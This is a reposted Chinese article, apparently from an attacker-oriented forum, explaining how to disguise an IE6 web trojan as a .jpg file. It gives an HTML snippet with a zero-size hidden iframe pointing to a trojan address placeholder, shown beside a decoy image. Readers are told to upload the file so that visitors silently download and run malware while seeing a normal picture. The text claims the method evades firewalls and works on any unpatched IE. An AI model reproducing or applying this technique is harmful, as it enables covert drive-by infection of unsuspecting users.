[转载]分析国内流行的IE6.0最新网页木马
信息来源:网络
特点:1 针对任何没有打过补丁的IE版本都有效!
2 木马下载过程中防火墙不会做任何反应!
3 木马地址以jpg为后缀名。列如 http://xxx.xxx.xxx.xxx/003.jpg 和一般的图片地址无任何俩样!打开地址后在浏览器上会和正常情况下一样出现图片!但木马却已经在后台下载并在下载完成后自动执行!具有很强的迷惑性!
一般来说,我们做出来的网页木马地址都是以 htm 或html 结尾!那么我们怎么修改呢?很简单!
不知道大家知道不知道。IE有一个很小的BUG。即只要网站文件里有html码它就会执行,并不理会文件后缀名是什么。
于是我们可以这么来修改网页木马的后缀名,其实说准确一点并不是修改点网页木马的地址后缀名,是利用一个图片地址来打开这个网页木马!
打开记事本写入如下一段代码:
<html>
<iframe src="IE6。0网页木马地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="图片地址"></center>
</html>
然后将其另存为XXX.jpg 。
剩下的工作就是将这个XXX.jpg图片格式的文件上传的你的空间,给出相对路径让别人访问了!
别人在访问这个XXX.jpg文件时。。浏览器会将文件内的html码执行,根据代码的内容。你的网页木马地址会作为隐藏窗口被打开。。另外那个图片也会出现在对方所打开的网页上